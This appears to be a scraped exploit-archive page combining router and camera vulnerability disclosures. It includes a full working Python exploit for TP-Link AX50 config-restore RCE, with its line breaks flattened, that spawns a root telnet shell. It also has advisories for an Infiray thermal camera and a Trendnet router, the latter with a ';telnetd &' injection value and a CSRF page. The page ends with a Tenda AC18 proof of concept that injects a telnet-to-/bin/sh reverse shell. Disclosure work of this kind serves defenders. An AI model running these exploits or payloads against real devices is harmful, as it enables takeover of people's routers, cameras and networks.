Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF P. Espernberger / @2022

SoftGuard SNMP Network Management Extension HTML Injection / File Download

TP-Link AX50 router with firmware 210730 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Tomas Melicher# Technical Details: https://github.com/aaronsvk/CVE-2022-30075# Date: 2022-06-08# Vendor Homepage: https://www.tp-link.com/# Tested On: Tp-Link Archer AX50# Vulnerability Description: Remote Code Execution via importing malicious config file# CVE: CVE-2022-30075#!/usr/bin/python3import argparse # pip install argparseimport requests # pip install requestsimport binascii, base64, os, re, json, sys, time, math, random, hashlibimport tarfile, zlibfrom Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodomefrom Crypto.PublicKey import RSAfrom Crypto.Util.Padding import pad, unpadfrom Crypto.Random import get_random_bytesfrom urllib.parse import urlencodeclass WebClient(object):  def __init__(self, target, password):    self.target = target    self.password = password.encode('utf-8')    self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')    self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.stok = ''    self.session = requests.Session()    data = self.basic_request('/login?form=auth', {'operation':'read'})    if data['success'] != True:      print('[!] unsupported router')      return    self.sign_rsa_n = int(data['data']['key'][0], 16)    self.sign_rsa_e = int(data['data']['key'][1], 16)    self.seq = data['data']['seq']    data = self.basic_request('/login?form=keys', {'operation':'read'})    self.password_rsa_n = int(data['data']['password'][0], 16)    self.password_rsa_e = int(data['data']['password'][1], 16)    self.stok = self.login()  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def rsa_encrypt(self, n, e, plaintext):    public_key = RSA.construct((n, e)).publickey()    encryptor = PKCS1_v1_5.new(public_key)    block_size = int(public_key.n.bit_length()/8) - 11    encrypted_text = ''    for i in range(0, len(plaintext), block_size):      encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()    return encrypted_text  def download_request(self, url, post_data):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)    filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]    if os.path.exists(filepath):      print('[!] can\'t download, file "%s" already exists' % filepath)      return    with open(filepath, 'wb') as f:      for chunk in res.iter_content(chunk_size=4096):        f.write(chunk)    return filepath  def basic_request(self, url, post_data, files_data={}):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)    return json.loads(res.content)  def encrypted_request(self, url, post_data):    serialized_data = urlencode(post_data)    encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))    encrypted_data = base64.b64encode(encrypted_data)    signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))    encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important    if(res.status_code != 200):      print('[!] url "%s" returned unexpected status code'%(url))      return    encrypted_data = json.loads(res.content)    encrypted_data = base64.b64decode(encrypted_data['data'])    data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)    return json.loads(data)  def login(self):    post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}    data = self.encrypted_request('/login?form=login', post_data)    if data['success'] != True:      print('[!] login failed')      return    print('[+] logged in, received token (stok): %s'%(data['data']['stok']))    return data['data']['stok']class BackupParser(object):  def __init__(self, filepath):    self.encrypted_path = os.path.abspath(filepath)    self.decrypted_path = os.path.splitext(filepath)[0]    self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua    self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def encrypt_config(self):    if not os.path.isdir(self.decrypted_path):      print('[!] invalid directory "%s"'%(self.decrypted_path))      return    # encrypt, compress each .xml using zlib and add them to tar archive    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:      for filename in os.listdir(self.decrypted_path):        basename,ext = os.path.splitext(filename)        if ext == '.xml':          xml_path = '%s/%s'%(self.decrypted_path,filename)          bin_path = '%s/%s.bin'%(self.decrypted_path,basename)          with open(xml_path, 'rb') as f:            plaintext = f.read()          if len(plaintext) == 0:            f = open(bin_path, 'w')            f.close()          else:            compressed = zlib.compress(plaintext)            encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)            with open(bin_path, 'wb') as f:              f.write(encrypted)          tar.add(bin_path, os.path.basename(bin_path))          os.unlink(bin_path)    # compress tar archive using zlib and encrypt    with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:      compressed = zlib.compress(f1.read()+f2.read())    encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)    # write into final config file    with open('%s'%(self.encrypted_path), 'wb') as f:      f.write(encrypted)    os.unlink('%s/data.tar'%(self.decrypted_path))  def decrypt_config(self):    if not os.path.isfile(self.encrypted_path):      print('[!] invalid file "%s"'%(self.encrypted_path))      return    # decrypt and decompress config file    with open(self.encrypted_path, 'rb') as f:      decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())    decompressed = zlib.decompress(decrypted)    os.mkdir(self.decrypted_path)    # store decrypted data into files    with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[0:16])    with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[16:])    # untar second part of decrypted data    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:      tar.extractall(path=self.decrypted_path)    # decrypt and decompress each .bin file from tar archive    for filename in os.listdir(self.decrypted_path):      basename,ext = os.path.splitext(filename)      if ext == '.bin':        bin_path = '%s/%s'%(self.decrypted_path,filename)        xml_path = '%s/%s.xml'%(self.decrypted_path,basename)        with open(bin_path, 'rb') as f:          ciphertext = f.read()        os.unlink(bin_path)        if len(ciphertext) == 0:          f = open(xml_path, 'w')          f.close()          continue        decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)        decompressed = zlib.decompress(decrypted)        with open(xml_path, 'wb') as f:          f.write(decompressed)    os.unlink('%s/data.tar'%(self.decrypted_path))  def modify_config(self, command):    xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)    if not os.path.isfile(xml_path):      print('[!] invalid file "%s"'%(xml_path))      return    with open(xml_path, 'r') as f:      xml_content = f.read()    # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script    payload = '<service name="exploit">\n'    payload += '<enabled>on</enabled>\n'    payload += '<update_url>http://127.0.0.1/</update_url>\n'    payload += '<domain>x.example.org</domain>\n'    payload += '<username>X</username>\n'    payload += '<password>X</password>\n'    payload += '<ip_source>script</ip_source>\n'    payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))    payload += '<interface>internet</interface>\n' # not worked for other interfaces    payload += '<retry_interval>5</retry_interval>\n'    payload += '<retry_unit>seconds</retry_unit>\n'    payload += '<retry_times>3</retry_times>\n'    payload += '<check_interval>12</check_interval>\n'    payload += '<check_unit>hours</check_unit>\n'    payload += '<force_interval>30</force_interval>\n'    payload += '<force_unit>days</force_unit>\n'    payload += '</service>\n'    if '<service name="exploit">' in xml_content:      xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)    else:      xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)    with open(xml_path, 'w') as f:      f.write(xml_content)arg_parser = argparse.ArgumentParser()arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)arg_parser.add_argument('-p', metavar='password', required=True)arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')args = arg_parser.parse_args()client = WebClient(args.t, args.p)parser = Noneif not args.r:  print('[*] downloading config file ...')  filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})  if not filepath:    sys.exit(-1)  print('[*] decrypting config file "%s" ...'%(filepath))  parser = BackupParser(filepath)  parser.decrypt_config()  print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))if not args.b and not args.r:  filepath = '%s_modified'%(parser.decrypted_path)  os.rename(parser.decrypted_path, filepath)  parser.decrypted_path = os.path.abspath(filepath)  parser.encrypted_path = '%s.bin'%(filepath)  parser.modify_config(args.c)  print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))if not args.b:  if parser is None:    parser = BackupParser('%s.bin'%(args.r.rstrip('/')))  print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))  parser.encrypt_config()  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})  timeout = data['data']['totaltime'] if data['success'] else 180  print('[*] uploading modified config file "%s"'%(parser.encrypted_path))  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})  if not data['success']:    print('[!] unexpected response')    print(data)    sys.exit(-1)  print('[+] config file successfully uploaded')  print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))

TP-Link AX50 Remote Code Execution

Infiray IRAY-A8Z3 thermal camera version 1.0.957 suffers from hardcoded web credential, authenticated remote code execution, buffer overflow, lack of password for root, and outdated software component vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220607-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Infiray IRAY-A8Z3 thermal camera  
  vulnerable version: V1.0.957  
       fixed version: None  
          CVE number: CVE-2022-31208, CVE-2022-31209, CVE-2022-31210,  
                      CVE-2022-31211  
              impact: Critical  
            homepage: http://www.infiray.com/  
               found: 2021-02  
                  by: S. Robertz (Office Vienna)  
                      F. Lienhart  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"IRay Technology Co., Ltd. is a wholly-owned subsidiary of Raytron Technology  
Co., Ltd. (SSE: 688002). As a high-tech enterprise, IRay Technology develops  
and manufactures infrared FPA detectors, thermal imaging modules, and other  
products, with completely independent intellectual property rights. We are  
committed to providing global customers with professional thermal imaging  
products and solutions. The main products include IRFPA detectors, thermal  
imaging cores, and terminal products for application."

Source: http://www.infiray.com/about.html

Business recommendation:  
------------------------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The binary file "/usr/local/sbin/webproject/set_param.cgi" contains hardcoded  
credentials to the web application. As these accounts cannot be deactivated  
or change their passwords, they are considered to be backdoor accounts.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The webserver contains an endpoint that can execute arbitrary commands by  
manipulating the "cmd_string" URL parameter. The user can login using one  
of the backdoor accounts from issue 1.

3) Potential Buffer Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow by calling strcpy() without  
checking the string length beforehand.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera offers a shell through a telnet connection. The root user does not  
require a password per default. Thus, anyone on the local network can  
execute arbitrary commands as root on the camera.

5) Multiple Outdated Software Components  
Multiple outdated software components containing vulnerabilities were found by  
the IoT Inspector (ONEKEY) firmware analysis platform.

Proof of concept:  
-----------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The following cgi program will be executed during the login process:

http://<my_ip>:8080/set_param.cgi?&group_tag=hash_param_bridge  
&set_cmd=loading&length=35&name=<user>&password=<password>&access=0  
&0.3543773172371312

The following de-compilation shows the code flow with the hardcoded passwords:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The authentication works by comparing the URL supplied username with the string  
"[removed]". Afterwards it will compare the password parameter to "[removed]" as well. If both  
string parameters match, a message will be removed from the messaging queue.  
Otherwise the function will just return. The same comparison holds for the admin account.

Furthermore, string comparisons are made without checking the case. Hence,  
drastically improving the chances of brute-force attacks.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The web application offers an option to view the device log. Opening following URL while  
logged in as admin (e.g. with hardcoded password from section 1) will trigger the request:

http://<my_ip>:8080/cmd.cgi?cmd_tag=cmd_passthrough&cmd_string=[removed]

By changing the "cmd_string" parameter, arbitrary commands can be executed with  
the rights of the webserver (www-data). The de-compiled code can be seen in following  
snippet:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The "cmd_string" parameter is directly passed into popen() and hence executed.

3) Potential Buffer-Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow vulnerability:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
A pointer to the "next_url" parameter is supplied. A buffer of 64 bytes is  
allocated and the parameter value copied to it without checking the string  
length. Hence, a "next_url" parameter with more than 64 bytes could be  
supplied in order to overflow the buffer.  
Please note that this vulnerability is only based on firmware analysis and thus  
was not tested in a live scenario.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera has a telnetd server running on port 23 per default. The root  
password is empty. If the telnet port is exposed to the internet, an attacker  
could easily connect to the device and gain root access. The telnet server  
cannot be deactivated and the root password cannot be changed through the  
web interface.

5) Multiple Outdated Software Components  
IoT Inspector (ONEKEY) recognized multiple outdated software components  
with known vulnerabilities:

BusyBox 1.25.0:                                  6 CVEs  
curl 7.54.0:                                    13 CVEs  
Dnsmasq 2.76:                                    9 CVEs  
lighttpd 1.4.41:                                 2 CVEs  
Linux Kernel 3.10.104:                        1004 CVEs  
hostapd 2.5:                                    22 CVEs  
wpa_supplicant 2.5-devel_rtw_r17190.20160415:   12 CVEs

Vulnerable / tested versions:  
-----------------------------  
The following product/firmware version has been tested:  
* Infiray IRAY-A8Z3 V1.0.957

It has to be assumed that further products or firmware versions are affected as well.

Vendor contact timeline:  
------------------------  
2021-02-24: Contacting vendor through email address found on their website  
             (sales@infiray.com)  
2021-03-11: Contacted vendor again through sales@infiray.com  
2021-04-12: Contacting vendor through sales@infiray.com and InfiRay.CS@iraytek.com  
2021-04-12: Response from Sales Director, does not understand what to do with the information  
2021-04-12: Requesting a contact to the product owner or developer  
2021-04-13: Sending unencrypted security advisory to two provided email addresses.  
2021-04-29: Requesting status from vendor, no reply.  
2022-04-05: Requested status from vendor, no reply.  
2022-06-07: Release of security advisory.

Solution:  
---------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz, F. Lienhart / @2022

Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials

Zyxel firewalls, AP controllers, and APs suffer from buffer overflow, format string, and command injection vulnerabilities.

Zyxel Buffer Overflow / Format String / Command Injection

An issue was found on TRENDnet TEW-831DR 1.0 601.130.1.1356 devices. An OS injection vulnerability exists within the web interface, allowing an attacker with valid credentials to execute arbitrary shell commands.

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

*   Technical Advisory: Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)
*   Technical Advisory: Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)
*   Technical Advisory: OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)
*   Technical Advisory: CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)
*   Technical Advisory: Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Technical Advisories:

**Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30326  
Severity: Medium 5.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

**Impact**

An attacker can use a simple XSS payload to crash the main page of the router web interface.

**Details**

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS the web interface accepts input from the user and stores it for later without proper encoding. A web application that is vulnerable to XSS allows an attacker to send a malicious script to the user.

The example below will crash the basic\_conf page and create a popup on the 5G home.htm page:

    <input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30328  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

**Impact**

A malicious user can change the username and password of the interface.

**Details**

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user to send a request to the web interface to change the username and password of the router.

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners should logout of the device web interface after use.

**OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30329  
Severity: Medium 6.3

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

**Impact**

An OS injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to execute arbitrary shell commands.

**Details**

The web interface has a diagnostics page that uses ping/traceroute. In the host(domain) an attacker can enter an IP with a ; at the end and inject a command to be executed by the device. Using command injection telnetd can be enabled. Telnetd is a remote terminal protocol server.

For example, the following can be entered into the host(domain) to enable telnetd:

    192.168.10.02;telnetd &

After running the command, any telnet client can be used to login to the root account from the local area network (LAN):

    user: root
    Password: the admin password 

Running the ls command will list the files in the current directory:

    bin   etc   init  mnt   root  tmp   var
    dev   home  lib   proc  sys   usr   web

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30327  
Severity: High 7.6

**Summary**

Trendnet TEW-831DR WiFi router is a general consumer WiFi router with a web interface for configuration. It was found that the routers browser interface is vulnerable to CSRF.

**Impact**

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key to the WiFi router if the interface IP is known.

**Details**

Cross-Site Request Forgery is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application using the same browser. The malicious web application can send unwanted requests to the vulnerable web application.

If the user is logged into the router web interface an attacker could create a page like the example below and trick a user into clicking it to change the router WiFi pre-shared key or SSID.

e.g.:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.10.1/boafrm/formWizard" method="POST">
    
          <input type="hidden" name="pskValue0" value="password" />
          <input type="hidden" name="pskValue1" value="password" />
          <input type="hidden" name="cliPskValue0" value="password" />
          <input type="hidden" name="cliPskValue1" value="password" />
          <input type="hidden" name="apply" value="Save &amp; Apply" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30325  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is the same for every router but the last four digits.

**Impact**

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

**Details**

The device default pre-shared key has the same seven out of eleven digits for every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

    The first seven default characters of the pre-shared key:
    831R100

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should update the current wifi key to new one through the web interface.

**Disclosure Timeline:**

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022 – Trendnet released firmware version:v1.0(601.130.1.1410).

**Thanks to**

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Additionally, Trendnet for their on going cooperation.

**About NCC Group**

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

CVE-2022-30329: Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

Tenda AC18 router V15.03.05.19 and V15.03.05.05 was discovered to contain a remote code execution (RCE) vulnerability via the Mac parameter at ip/goform/WriteFacMac.

Permalink

Vendor:Tenda https://www.tenda.com.cn/default.html product:AC18 version:V15.03.05.19 and V15.03.05.05 type:Arbitrary Remote Command Execution author:WuShaoZhen institution:WuShaoZhen@Xiangtan University

**Vulnerability description:**

I found an Arbitrary Command Execution vulnerability in the router's web server-- **/bin/httpd** of squashfs filesystem. While processing the **mac** parameters for a post request(when an attacker accesses ip/goform/WriteFacMac), the value is directly passed to doSystem, which causes a RCE. The details are shown below:

Close the previous command with a semicolon and then cause an Arbitrary Remote Command Execution

**Poc:**

    import requests
    from pwn import*
    
    ip = "192.168.211.128" #You Tenda AC18 Router IP
    url = "http://" + ip + "/goform/WriteFacMac"
    print(url)
    
    
    #payload = ";cmd"
    #payload = ";telnet ip port1 | /bin/sh | telnet ip port2"
    payload = ";telnet 127.0.0.1:1111 | /bin/sh | telnet 127.0.0.1:2222"
    
    
    cookie = {"Cookie":"password=12345"}
    data = {"mac": payload}
    response = requests.post(url, cookies=cookie, data=data)
    print(response.text)
    print("HackAttackSuccess!")
    

Use the above POC to play shell through telnet You can get a very stable shell

Tag

#telnet